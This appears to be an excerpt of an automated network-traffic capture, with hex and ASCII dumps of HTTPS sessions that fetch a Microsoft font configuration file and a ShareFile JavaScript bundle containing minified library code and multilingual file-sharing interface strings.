                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 5c 64 2b 29 3f 5b 5c 77 20 5d 3f 7c 5e 5c 64 7b 31 2c 34 7d 5b 5c 2f 5c 2d 5d 5c 64 7b 31 2c 34 7d 5b 5c 2f 5c 2d 5d 5c 64 7b 31 2c 34 7d 7c 5e 5c 77 2b 2c 20 5c 77 2b 20 5c 64 2b 2c 20 5c 64 7b 34 7d 29 2f 2c 6c 3d 2f 5e 30 78 5b 30 2d 39 61 2d 66 5d 2b 24 2f 69 2c 63 3d 2f 5e 30 2f 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 69 6e 73 65 6e 73 69 74 69 76 65 26 26 28 22 22 2b 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7c 7c 22 22 2b 65 7d 2c 64 3d 75 28 65 29 2e 72 65 70 6c 61 63 65 28 61 2c 22 22 29 7c 7c 22 22 2c 70 3d 75 28 6e 29 2e 72 65 70 6c 61 63 65 28 61 2c 22 22 29 7c 7c 22 22 2c 66 3d 64 2e 72 65 70 6c 61 63 65 28 69 2c 22 5c 30 24 31 5c 30 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 30 24 2f 2c 22 22 29 2e 72 65 70
                                                                                                                                                                                                                      Data Ascii: \d+)?[\w ]?|^\d{1,4}[\/\-]\d{1,4}[\/\-]\d{1,4}|^\w+, \w+ \d+, \d{4})/,l=/^0x[0-9a-f]+$/i,c=/^0/,u=function(e){return t.insensitive&&(""+e).toLowerCase()||""+e},d=u(e).replace(a,"")||"",p=u(n).replace(a,"")||"",f=d.replace(i,"\0$1\0").replace(/\0$/,"").rep
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC15247INData Raw: 6f 74 79 70 65 2c 73 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 28 5b 2e 2a 2b 3f 5e 3d 21 3a 24 7b 7d 28 29 7c 5b 5c 5d 5c 2f 5c 5c 5d 29 2f 67 2c 22 5c 5c 24 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 55 6e 64 65 66 69 6e 65 64 22 3a 53 74 72 69 6e 67 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 22 41 72 72 61 79 22 3d 3d 3d 63 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28
                                                                                                                                                                                                                      Data Ascii: otype,s=Object.prototype.hasOwnProperty;function l(e){return e.replace(/([.*+?^=!:${}()|[\]\/\\])/g,"\\$1")}function c(e){return e===undefined?"Undefined":String(Object.prototype.toString.call(e)).slice(8,-1)}function d(e){return"Array"===c(e)}function p(
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC12792INData Raw: 26 6e 2e 68 61 73 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 2c 6c 3d 61 26 26 69 2e 69 64 6e 5f 65 78 70 72 65 73 73 69 6f 6e 2e 74 65 73 74 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 2c 63 3d 61 26 26 69 2e 70 75 6e 79 63 6f 64 65 5f 65 78 70 72 65 73 73 69 6f 6e 2e 74 65 73 74 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 29 2c 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 63 61 73 65 22 72 65 6c 61 74 69 76 65 22 3a 72 65 74 75 72 6e 20 75 3b 63 61 73 65 22 61 62 73 6f 6c 75 74 65 22 3a 72 65 74 75 72 6e 21 75 3b 63 61 73 65 22 64 6f 6d 61 69 6e 22 3a 63 61 73 65 22 6e 61 6d 65 22 3a 72 65 74 75 72 6e 20 61 3b 63 61 73 65 22 73 6c 64 22 3a 72 65 74 75 72 6e 20 73 3b 63 61 73 65 22
                                                                                                                                                                                                                      Data Ascii: &n.has(this._parts.hostname),l=a&&i.idn_expression.test(this._parts.hostname),c=a&&i.punycode_expression.test(this._parts.hostname)),e.toLowerCase()){case"relative":return u;case"absolute":return!u;case"domain":case"name":return a;case"sld":return s;case"
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 22 3d 3d 3d 6f 2e 5f 70 61 72 74 73 2e 70 61 74 68 2e 73 75 62 73 74 72 69 6e 67 28 2d 32 29 26 26 28 6f 2e 5f 70 61 72 74 73 2e 70 61 74 68 2b 3d 22 2f 22 29 2c 22 2f 22 21 3d 3d 6f 2e 70 61 74 68 28 29 2e 63 68 61 72 41 74 28 30 29 26 26 28 74 3d 28 74 3d 65 2e 64 69 72 65 63 74 6f 72 79 28 29 29 7c 7c 28 30 3d 3d 3d 65 2e 70 61 74 68 28 29 2e 69 6e 64 65 78 4f 66 28 22 2f 22 29 3f 22 2f 22 3a 22 22 29 2c 6f 2e 5f 70 61 72 74 73 2e 70 61 74 68 3d 28 74 3f 74 2b 22 2f 22 3a 22 22 29 2b 6f 2e 5f 70 61 72 74 73 2e 70 61 74 68 2c 6f 2e 6e 6f 72 6d 61 6c 69 7a 65 50 61 74 68 28 29 29 29 3a 28 6f 2e 5f 70 61 72 74 73 2e 70 61 74 68 3d 65 2e 5f 70 61 72 74 73 2e 70 61 74 68 2c 6f 2e 5f 70 61 72 74 73 2e 71 75 65 72 79 7c 7c 28 6f 2e 5f 70 61 72 74 73 2e 71 75
                                                                                                                                                                                                                      Data Ascii: "===o._parts.path.substring(-2)&&(o._parts.path+="/"),"/"!==o.path().charAt(0)&&(t=(t=e.directory())||(0===e.path().indexOf("/")?"/":""),o._parts.path=(t?t+"/":"")+o._parts.path,o.normalizePath())):(o._parts.path=e._parts.path,o._parts.query||(o._parts.qu
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 34 5d 3d 22 43 61 6e 43 68 65 63 6b 4f 75 74 22 2c 65 5b 65 2e 43 61 6e 43 68 65 63 6b 49 6e 3d 32 30 34 38 5d 3d 22 43 61 6e 43 68 65 63 6b 49 6e 22 2c 65 5b 65 2e 43 61 6e 44 69 73 63 61 72 64 43 68 65 63 6b 6f 75 74 3d 34 30 39 36 5d 3d 22 43 61 6e 44 69 73 63 61 72 64 43 68 65 63 6b 6f 75 74 22 2c 65 5b 65 2e 43 61 6e 54 6f 67 67 6c 65 46 61 76 6f 72 69 74 65 3d 38 31 39 32 5d 3d 22 43 61 6e 54 6f 67 67 6c 65 46 61 76 6f 72 69 74 65 22 2c 65 5b 65 2e 43 61 6e 49 6e 69 74 69 61 74 65 41 70 70 72 6f 76 61 6c 3d 31 36 33 38 34 5d 3d 22 43 61 6e 49 6e 69 74 69 61 74 65 41 70 70 72 6f 76 61 6c 22 2c 65 5b 65 2e 43 61 6e 43 72 65 61 74 65 4f 66 66 69 63 65 44 6f 63 75 6d 65 6e 74 73 3d 33 32 37 36 38 5d 3d 22 43 61 6e 43 72 65 61 74 65 4f 66 66 69 63 65 44
                                                                                                                                                                                                                      Data Ascii: 4]="CanCheckOut",e[e.CanCheckIn=2048]="CanCheckIn",e[e.CanDiscardCheckout=4096]="CanDiscardCheckout",e[e.CanToggleFavorite=8192]="CanToggleFavorite",e[e.CanInitiateApproval=16384]="CanInitiateApproval",e[e.CanCreateOfficeDocuments=32768]="CanCreateOfficeD
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 3a 75 2c 72 65 73 70 6f 6e 73 65 4a 53 4f 4e 3a 7b 6d 65 73 73 61 67 65 3a 7b 76 61 6c 75 65 3a 22 52 65 73 6f 75 72 63 65 20 75 6e 61 76 61 69 6c 61 62 6c 65 22 7d 7d 7d 29 3a 28 6c 2e 4c 69 6e 6b 3f 69 3d 6c 2e 52 65 64 69 72 65 63 74 69 6f 6e 26 26 6c 2e 52 65 64 69 72 65 63 74 69 6f 6e 2e 55 72 69 3f 74 2e 67 65 74 52 65 64 69 72 65 63 74 69 6f 6e 55 72 6c 28 6c 2e 52 65 64 69 72 65 63 74 69 6f 6e 2e 55 72 69 29 3a 74 2e 67 65 74 52 65 64 69 72 65 63 74 69 6f 6e 55 72 6c 28 6c 2e 4c 69 6e 6b 29 3a 28 69 3d 6f 2e 55 72 69 2c 61 3d 6f 2e 42 6f 64 79 7c 7c 61 2c 73 3d 6f 2e 4d 65 74 68 6f 64 7c 7c 73 29 2c 76 6f 69 64 20 67 28 29 29 3a 76 6f 69 64 20 68 28 7b 6b 69 6e 64 3a 6a 2e 45 78 63 65 65 64 65 64 4d 61 78 69 6d 75 6d 52 65 64 69 72 65 63 74 73 2c
                                                                                                                                                                                                                      Data Ascii: :u,responseJSON:{message:{value:"Resource unavailable"}}}):(l.Link?i=l.Redirection&&l.Redirection.Uri?t.getRedirectionUrl(l.Redirection.Uri):t.getRedirectionUrl(l.Link):(i=o.Uri,a=o.Body||a,s=o.Method||s),void g()):void h({kind:j.ExceededMaximumRedirects,
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC3592INData Raw: 28 65 29 29 74 2e 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 3d 65 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 65 2e 73 70 6c 69 74 28 22 2f 22 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 2b 65 7d 29 29 2c 69 3d 6e 28 6f 2c 32 29 2c 73 3d 69 5b 30 5d 2c 6c 3d 69 5b 31 5d 3b 61 2e 67 72 69 64 43 6f 6c 75 6d 6e 53 74 61 72 74 28 73 2c 74 29 2c 61 2e 67 72 69 64 43 6f 6c 75 6d 6e 45 6e 64 28 6c 2c 74 29 7d 7d 2c 67 72 69 64 43 6f 6c 75 6d 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 2e 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 3b 72 28 65 29 26 26 72 28 6e 29 26 26 28 74 2e 6d 73 47 72 69 64 43 6f 6c 75 6d 6e 53 70 61 6e 3d 65 2d 6e 29 7d 2c 67 72 69 64 43 6f 6c 75 6d 6e 53 74 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                      Data Ascii: (e))t.msGridColumn=e;else{var o=e.split("/").map((function(e){return+e})),i=n(o,2),s=i[0],l=i[1];a.gridColumnStart(s,t),a.gridColumnEnd(l,t)}},gridColumnEnd:function(e,t){var n=t.msGridColumn;r(e)&&r(n)&&(t.msGridColumnSpan=e-n)},gridColumnStart:function(
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 29 3b 76 61 72 20 62 74 3d 4d 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 2c 6c 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 29 7b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 28 30 2c 72 5b 22 64 65 66 61 75 6c 74 22 5d 29 28 65 29 29 72 65 74 75 72 6e 20 65 3b 66 6f 72 28 76 61 72 20 6f 3d 65 2e 73 70 6c 69 74 28 2f 2c 28 3f 21 5b 5e 28 29 5d 2a 28 3f 3a 5c 28 5b 5e 28 29 5d 2a 5c 29 29 3f 5c 29 29 2f 67 29 2c 69
                                                                                                                                                                                                                      Data Ascii: );var bt=Me((function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t["default"]=function(e,t,i,l){if("string"==typeof t&&a.hasOwnProperty(e)){var c=function(e,t){if((0,r["default"])(e))return e;for(var o=e.split(/,(?![^()]*(?:\([^()]*\))?\))/g),i


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      62192.168.2.1749782184.28.90.27443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                      Cache-Control: public, max-age=214036
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:12 GMT
                                                                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      63192.168.2.174978313.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC420OUTGET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 1807333
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 09:27:42 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:12 GMT
                                                                                                                                                                                                                      ETag: "599a89980a09447aff755be20d4eacfd"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 5076c8187f430eebe5e26fc594d6125a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: s4JCoeebMPKHzQupKaZffnJ2Hyff-inBPmj4UH5DyCx0mJ9OOG_22g==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC15861INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 64 6f 63 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 5f 5f 57 45 42 50 41 43 4b 5f 44 59 4e 41 4d 49 43 5f 45 58 50 4f 52 54 5f 5f 2c 5f 5f 73 79 73 74 65 6d 5f 63 6f 6e 74 65 78 74 5f 5f 29 7b 76 61 72 20 5f 5f 57 45 42 50 41 43 4b 5f 45 58 54 45 52 4e 41 4c 5f 4d
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_M
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 36 39 22 2c 22 23 35 31 32 35 38 66 22 2c 22 23 36 34 32 61 62 35 22 2c 22 23 38 35 34 65 63 61 22 2c 22 23 61 62 37 61 65 30 22 2c 22 23 63 64 61 38 66 30 22 2c 22 23 65 62 64 37 66 61 22 5d 3b 4a 2e 70 72 69 6d 61 72 79 3d 4a 5b 35 5d 3b 76 61 72 20 65 65 3d 5b 22 23 32 39 31 33 32 31 22 2c 22 23 34 30 31 36 32 66 22 2c 22 23 35 35 31 63 33 62 22 2c 22 23 37 35 32 30 34 66 22 2c 22 23 61 30 32 36 36 39 22 2c 22 23 63 62 32 62 38 33 22 2c 22 23 65 30 35 32 39 63 22 2c 22 23 66 33 37 66 62 37 22 2c 22 23 66 38 61 38 63 63 22 2c 22 23 66 61 64 32 65 33 22 5d 3b 65 65 2e 70 72 69 6d 61 72 79 3d 65 65 5b 35 5d 3b 76 61 72 20 74 65 3d 5b 22 23 31 35 31 35 31 35 22 2c 22 23 31 66 31 66 31 66 22 2c 22 23 32 64 32 64 32 64 22 2c 22 23 33 39 33 39 33 39 22 2c 22
                                                                                                                                                                                                                      Data Ascii: 69","#51258f","#642ab5","#854eca","#ab7ae0","#cda8f0","#ebd7fa"];J.primary=J[5];var ee=["#291321","#40162f","#551c3b","#75204f","#a02669","#cb2b83","#e0529c","#f37fb7","#f8a8cc","#fad2e3"];ee.primary=ee[5];var te=["#151515","#1f1f1f","#2d2d2d","#393939","
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6e 6f 74 5f 61 6c 6c 6f 77 65 64 3a 22 44 61 73 20 61 75 73 67 65 77 c3 a4 68 6c 74 65 20 45 6c 65 6d 65 6e 74 20 6b 61 6e 6e 20 6e 69 63 68 74 20 69 6e 20 64 69 65 73 65 6e 20 4f 72 64 6e 65 72 20 76 65 72 73 63 68 6f 62 65 6e 20 77 65 72 64 65 6e 2e 20 57 c3 a4 68 6c 65 6e 20 53 69 65 20 65 69 6e 65 6e 20 61 6e 64 65 72 65 6e 20 4f 72 64 6e 65 72 2e 22 2c 6d 6f 76 69 6e 67 5f 69 74 65 6d 5f 74 6f 3a 22 56 65 72 73 63 68 69 65 62 65 6e 20 76 6f 6e 20 27 7b 7b 66 69 6c 65 4e 61 6d 65 7d 7d 27 20 6e 61 63 68 20 27 7b 7b 64 65 73 74 69 6e 61 74 69 6f 6e 46 6f 6c 64 65 72 7d 7d 27 22 2c 6d 6f 76 69 6e 67 5f 69 74 65 6d 5f 74 6f 5f 70 6c 75 72 61 6c 3a 22 56 65 72 73 63 68 69 65 62 65 6e 20 76 6f 6e 20 7b 7b 63 6f 75 6e 74 7d 7d 20 45 6c 65 6d 65 6e 74 65 6e
                                                                                                                                                                                                                      Data Ascii: not_allowed:"Das ausgewhlte Element kann nicht in diesen Ordner verschoben werden. Whlen Sie einen anderen Ordner.",moving_item_to:"Verschieben von '{{fileName}}' nach '{{destinationFolder}}'",moving_item_to_plural:"Verschieben von {{count}} Elementen
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC15776INData Raw: 68 65 72 75 6e 74 65 72 6c 61 64 65 6e 2e 22 2c 76 69 65 77 5f 6f 6e 6c 79 3a 22 4d 69 74 61 72 62 65 69 74 65 72 20 6b c3 b6 6e 6e 65 6e 20 6e 61 63 68 20 64 65 72 20 41 6e 6d 65 6c 64 75 6e 67 20 61 6e 7a 65 69 67 65 6e 2e 22 2c 76 69 65 77 5f 77 61 74 65 72 6d 61 72 6b 3a 22 4d 69 74 61 72 62 65 69 74 65 72 20 6b c3 b6 6e 6e 65 6e 20 6e 61 63 68 20 64 65 72 20 41 6e 6d 65 6c 64 75 6e 67 20 65 69 6e 65 20 4b 6f 70 69 65 20 6d 69 74 20 57 61 73 73 65 72 7a 65 69 63 68 65 6e 20 61 6e 7a 65 69 67 65 6e 2e 22 7d 2c 72 65 71 75 69 72 65 5f 75 73 65 72 5f 69 6e 66 6f 3a 7b 76 69 65 77 5f 64 6f 77 6e 6c 6f 61 64 3a 22 42 65 69 20 45 69 6e 67 61 62 65 20 76 6f 6e 20 4e 61 6d 65 20 75 6e 64 20 45 2d 4d 61 69 6c 2d 41 64 72 65 73 73 65 20 6b 61 6e 6e 20 6a 65 64
                                                                                                                                                                                                                      Data Ascii: herunterladen.",view_only:"Mitarbeiter knnen nach der Anmeldung anzeigen.",view_watermark:"Mitarbeiter knnen nach der Anmeldung eine Kopie mit Wasserzeichen anzeigen."},require_user_info:{view_download:"Bei Eingabe von Name und E-Mail-Adresse kann jed
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 64 6f 77 6e 6c 6f 61 64 69 6e 67 20 74 68 65 20 66 69 6c 65 2e 20 53 6f 6d 65 20 66 69 6c 65 20 74 79 70 65 73 20 64 6f 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 76 69 65 77 2d 6f 6e 6c 79 20 73 68 61 72 69 6e 67 20 6f 72 20 77 61 74 65 72 6d 61 72 6b 69 6e 67 2e 22 2c 74 6f 6f 6c 74 69 70 5f 61 62 6f 75 74 5f 76 69 65 77 5f 6f 6e 6c 79 5f 6c 69 6e 6b 3a 22 41 62 6f 75 74 20 76 69 65 77 2d 6f 6e 6c 79 20 73 68 61 72 69 6e 67 22 2c 74 6f 6f 6c 74 69 70 5f 61 62 6f 75 74 5f 77 61 74 65 72 6d 61 72 6b 69 6e 67 5f 6c 69 6e 6b 3a 22 41 62 6f 75 74 20 77 61 74 65 72 6d 61 72 6b 69 6e 67 22 7d 2c 64 6f 77 6e 6c 6f 61 64 73 5f 6c 69 6d 69 74 73 3a 7b 75 6e 6c 69 6d 69 74 65 64 3a 22 55 6e 6c 69 6d 69 74 65 64 22 7d 2c 64 6f 77 6e 6c 6f 61 64 73 5f 70 65 72 5f 75 73
                                                                                                                                                                                                                      Data Ascii: downloading the file. Some file types do not support view-only sharing or watermarking.",tooltip_about_view_only_link:"About view-only sharing",tooltip_about_watermarking_link:"About watermarking"},downloads_limits:{unlimited:"Unlimited"},downloads_per_us
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 7b 6d 69 6e 75 74 65 73 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 6d 69 6e 20 22 2c 72 65 6d 61 69 6e 69 6e 67 3a 22 51 75 65 64 61 3a 20 7b 7b 72 65 6d 61 69 6e 69 6e 67 54 69 6d 65 44 69 73 70 6c 61 79 7d 7d 20 22 2c 72 65 74 72 79 69 6e 67 3a 22 45 72 72 6f 72 20 64 65 20 63 61 72 67 61 3a 20 52 65 69 6e 74 65 6e 74 61 6e 64 6f 22 2c 73 65 63 6f 6e 64 5f 72 65 6d 61 69 6e 69 6e 67 3a 22 7b 7b 73 65 63 6f 6e 64 73 52 65 6d 61 69 6e 69 6e 67 7d 7d 20 73 20 22 2c 73 68 6f 75 6c 64 6e 74 5f 74 61 6b 65 5f 6c 6f 6e 67 3a 22 45 73 70 65 72 65 20 75 6e 6f 73 20 6d 6f 6d 65 6e 74 6f 73 2e 2e 2e 22 2c 73 74 61 72 74 69 6e 67 5f 75 70 6c 6f 61 64 3a 22 49 6e 69 63 69 61 6e 64 6f 20 6c 61 20 63 61 72 67 61 2e 2e 2e 22 2c 74 72 61 6e 73 66 65 72 5f 70 72 6f 67 72 65 73
                                                                                                                                                                                                                      Data Ascii: {minutesRemaining}} min ",remaining:"Queda: {{remainingTimeDisplay}} ",retrying:"Error de carga: Reintentando",second_remaining:"{{secondsRemaining}} s ",shouldnt_take_long:"Espere unos momentos...",starting_upload:"Iniciando la carga...",transfer_progres
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 65 6d 61 6e 61 2e 22 2c 61 66 74 65 72 5f 73 69 78 5f 6d 6f 6e 74 68 73 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 73 65 69 73 20 6d 65 73 65 73 2e 22 2c 61 66 74 65 72 5f 74 68 72 65 65 5f 6d 6f 6e 74 68 73 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 74 72 65 73 20 6d 65 73 65 73 2e 22 2c 61 66 74 65 72 5f 78 5f 64 61 79 73 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 7b 7b 64 61 79 73 7d 7d 20 64 2e 22 2c 61 66 74 65 72 5f 79 65 61 72 3a 22 45 6c 20 65 6e 6c 61 63 65 20 63 61 64 75 63 61 72 c3 a1 20 61 6c 20 63 61 62 6f 20 64 65 20 75 6e 20 61 c3 b1 6f 2e 22 2c 6e 65 76 65 72 3a 22 45 6c 20
                                                                                                                                                                                                                      Data Ascii: emana.",after_six_months:"El enlace caducar al cabo de seis meses.",after_three_months:"El enlace caducar al cabo de tres meses.",after_x_days:"El enlace caducar al cabo de {{days}} d.",after_year:"El enlace caducar al cabo de un ao.",never:"El
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC14808INData Raw: 74 69 70 3a 22 45 78 69 67 65 6e 63 65 73 20 64 27 61 63 63 c3 a8 73 20 61 75 20 6c 69 65 6e 20 61 75 78 71 75 65 6c 6c 65 73 20 73 6f 6e 74 20 73 6f 75 6d 69 73 20 6c 65 73 20 64 65 73 74 69 6e 61 74 61 69 72 65 73 2e 20 4c 65 73 20 75 74 69 6c 69 73 61 74 65 75 72 73 20 65 6d 70 6c 6f 79 c3 a9 73 20 73 6f 6e 74 20 67 c3 a9 6e c3 a9 72 61 6c 65 6d 65 6e 74 20 64 65 73 20 70 65 72 73 6f 6e 6e 65 73 20 61 75 20 73 65 69 6e 20 64 65 20 76 6f 74 72 65 20 65 6e 74 72 65 70 72 69 73 65 2e 22 7d 2c 61 64 64 5f 77 61 74 65 72 6d 61 72 6b 3a 22 41 6a 6f 75 74 65 72 20 75 6e 20 66 69 6c 69 67 72 61 6e 65 22 2c 61 6c 6c 6f 77 5f 72 65 63 69 70 69 65 6e 74 73 3a 7b 65 64 69 74 5f 61 62 6f 75 74 5f 6c 69 6e 6b 3a 22 c3 80 20 70 72 6f 70 6f 73 20 64 65 20 6c 61 20 6d
                                                                                                                                                                                                                      Data Ascii: tip:"Exigences d'accs au lien auxquelles sont soumis les destinataires. Les utilisateurs employs sont gnralement des personnes au sein de votre entreprise."},add_watermark:"Ajouter un filigrane",allow_recipients:{edit_about_link:" propos de la m
